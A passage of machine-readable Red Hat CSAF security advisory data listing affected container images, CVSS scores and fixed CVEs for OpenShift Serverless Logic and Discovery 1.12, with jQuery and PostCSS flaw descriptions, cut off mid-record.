"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "serve-static: Improper Sanitization in serve-static"
}
]
}
RHSA-2025:1249
Vulnerability from csaf_redhat - Published: 2025-02-10 18:38 - Updated: 2025-11-25 15:44Summary
Red Hat Security Advisory: updated discovery container images
Notes
Topic
Updated container images are now available for Discovery 1.12.
Details
The Discovery container images provided by this update can be downloaded from the Red Hat Container Registry at registry.access.redhat.com. Installation instructions for your platform are available at Red Hat Container Catalog (see References).
Dockerfiles and scripts should be amended either to refer to these new images specifically, or to the latest images generally.
Fixed CVEs:
CVE-2024-39338
CVE-2024-56201
CVE-2024-45590
CVE-2024-41991
CVE-2024-42005
CVE-2024-41989
CVE-2024-8775
CVE-2024-43799
CVE-2024-43796
CVE-2024-43800
CVE-2024-45296
CVE-2024-43788
CVE-2024-21536
CVE-2024-56326
CVE-2024-21538
CVE-2020-11023
CVE-2024-55565
CVE-2023-44270
CVE-2024-6485
CVE-2024-53907
CVE-2024-56374
CVE-2024-52798
CVE-2024-31449
CVE-2024-46981
CVE-2024-31228
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Updated container images are now available for Discovery 1.12.",
"title": "Topic"
},
{
"category": "general",
"text": "The Discovery container images provided by this update can be downloaded from the Red Hat Container Registry at registry.access.redhat.com. Installation instructions for your platform are available at Red Hat Container Catalog (see References).\n\nDockerfiles and scripts should be amended either to refer to these new images specifically, or to the latest images generally.\n\nFixed CVEs:\nCVE-2024-39338\nCVE-2024-56201\nCVE-2024-45590\nCVE-2024-41991\nCVE-2024-42005\nCVE-2024-41989\nCVE-2024-8775\nCVE-2024-43799\nCVE-2024-43796\nCVE-2024-43800\nCVE-2024-45296\nCVE-2024-43788\nCVE-2024-21536\nCVE-2024-56326\nCVE-2024-21538\nCVE-2020-11023\nCVE-2024-55565\nCVE-2023-44270\nCVE-2024-6485\nCVE-2024-53907\nCVE-2024-56374\nCVE-2024-52798\nCVE-2024-31449\nCVE-2024-46981\nCVE-2024-31228",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2025:1249",
"url": "https://access.redhat.com/errata/RHSA-2025:1249"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "DISCOVERY-895",
"url": "https://issues.redhat.com/browse/DISCOVERY-895"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2025/rhsa-2025_1249.json"
}
],
"title": "Red Hat Security Advisory: updated discovery container images",
"tracking": {
"current_release_date": "2025-11-25T15:44:40+00:00",
"generator": {
"date": "2025-11-25T15:44:40+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.12"
}
},
"id": "RHSA-2025:1249",
"initial_release_date": "2025-02-10T18:38:39+00:00",
"revision_history": [
{
"date": "2025-02-10T18:38:39+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2025-02-10T18:38:39+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-11-25T15:44:40+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Discovery 1 for RHEL 9",
"product": {
"name": "Discovery 1 for RHEL 9",
"product_id": "9Base-discovery-1",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:discovery:1.0::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat Discovery"
},
{
"branches": [
{
"category": "product_version",
"name": "discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"product": {
"name": "discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"product_id": "discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"product_identification_helper": {
"purl": "pkg:oci/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771?arch=amd64\u0026repository_url=registry.redhat.io/discovery/discovery-server-rhel9\u0026tag=1.12.0-1"
}
}
},
{
"category": "product_version",
"name": "discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64",
"product": {
"name": "discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64",
"product_id": "discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a?arch=amd64\u0026repository_url=registry.redhat.io/discovery/discovery-ui-rhel9\u0026tag=1.12.0-1"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"product": {
"name": "discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"product_id": "discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"product_identification_helper": {
"purl": "pkg:oci/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70?arch=arm64\u0026repository_url=registry.redhat.io/discovery/discovery-server-rhel9\u0026tag=1.12.0-1"
}
}
},
{
"category": "product_version",
"name": "discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"product": {
"name": "discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"product_id": "discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c?arch=arm64\u0026repository_url=registry.redhat.io/discovery/discovery-ui-rhel9\u0026tag=1.12.0-1"
}
}
}
],
"category": "architecture",
"name": "arm64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64 as a component of Discovery 1 for RHEL 9",
"product_id": "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64"
},
"product_reference": "discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"relates_to_product_reference": "9Base-discovery-1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64 as a component of Discovery 1 for RHEL 9",
"product_id": "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64"
},
"product_reference": "discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"relates_to_product_reference": "9Base-discovery-1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64 as a component of Discovery 1 for RHEL 9",
"product_id": "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64"
},
"product_reference": "discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"relates_to_product_reference": "9Base-discovery-1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64 as a component of Discovery 1 for RHEL 9",
"product_id": "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
},
"product_reference": "discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64",
"relates_to_product_reference": "9Base-discovery-1"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2020-11023",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2020-06-23T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1850004"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in jQuery. HTML containing \\\u003coption\\\u003e elements from untrusted sources are passed, even after sanitizing, to one of jQuery\u0027s DOM manipulation methods, which may execute untrusted code. The highest threat from this vulnerability is to data confidentiality and integrity.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jquery: Untrusted code execution via \u003coption\u003e tag in HTML passed to DOM manipulation methods",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat Enterprise Linux versions 6, 7, and 8 ship a vulnerable version of JQuery in the `pcs` component. As PCS does not accept untrusted input, the vulnerable code cannot be controlled by an attacker.\n\nMultiple Red Hat offerings use doxygen to build documentation. During this process an affected jquery.js file can be included in the resulting package. The \u0027gcc\u0027 and \u0027tbb\u0027 packages were potentially vulnerable via this method.\n\nOpenShift Container Platform 4 is not affected because even though it uses the \u0027gcc\u0027 component, vulnerable code is limited within the libstdc++-docs rpm package, which is not shipped.\n\nWithin regulated environments, a combination of the following controls acts as a significant barrier to successfully exploiting a CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027) vulnerability and therefore downgrades the severity of this particular CVE from Moderate to Low.\n\nStatic code analysis controls ensure that security flaws, including XSS vulnerabilities, are detected early in development by scanning code for improper input handling. This prevents vulnerable code from reaching production and encourages our developers to follow secure coding practices. System monitoring controls play a crucial role in detecting and responding to XSS attacks by analyzing logs, monitoring user behavior, and generating alerts for suspicious activity. Meanwhile, AWS WAF (Web Application Firewall) adds an extra layer of defense by filtering and blocking malicious input before it reaches the platform and/or application. Together, these controls create a defense-in-depth approach, reducing the risk of XSS exploitation by preventing, detecting, and mitigating attacks at multiple levels.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-11023"
},
{
"category": "external",
"summary": "RHBZ#1850004",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1850004"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-11023",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-11023"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-11023",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11023"
},
{
"category": "external",
"summary": "https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/",
"url": "https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2020-04-29T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-02-10T18:38:39+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:1249"
},
{
"category": "workaround",
"details": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2025-01-23T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Moderate"
}
],
"title": "jquery: Untrusted code execution via \u003coption\u003e tag in HTML passed to DOM manipulation methods"
},
{
"cve": "CVE-2023-44270",
"cwe": {
"id": "CWE-93",
"name": "Improper Neutralization of CRLF Sequences (\u0027CRLF Injection\u0027)"
},
"discovery_date": "2024-11-18T14:11:50.400987+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2326998"
}
],
"notes": [
{
"category": "description",
"text": "An issue was discovered in PostCSS before 8.4.31. The vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being included in a comment.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "PostCSS: Improper input validation in PostCSS",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-44270"
},
{
"category": "external",
"summary": "RHBZ#2326998",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2326998"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-44270",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-44270"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-44270",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-44270"
},
{
"category": "external",
"summary": "https://github.com/github/advisory-database/issues/2820",
"url": "https://github.com/github/advisory-database/issues/2820"
},
{
"category": "external",
"summary": "https://github.com/postcss/postcss/blob/main/lib/tokenize.js#L25",
"url": "https://github.com/postcss/postcss/blob/main/lib/tokenize.js#L25"
},
{
"category": "external",
"summary": "https://github.com/postcss/postcss/commit/58cc860b4c1707510c9cd1bc1fa30b423a9ad6c5",
"url": "https://github.com/postcss/postcss/commit/58cc860b4c1707510c9cd1bc1fa30b423a9ad6c5"
},
{
"category": "external",
"summary": "https://github.com/postcss/postcss/releases/tag/8.4.31",
"url": "https://github.com/postcss/postcss/releases/tag/8.4.31"
}
],
"release_date": "2023-09-29T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-02-10T18:38:39+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
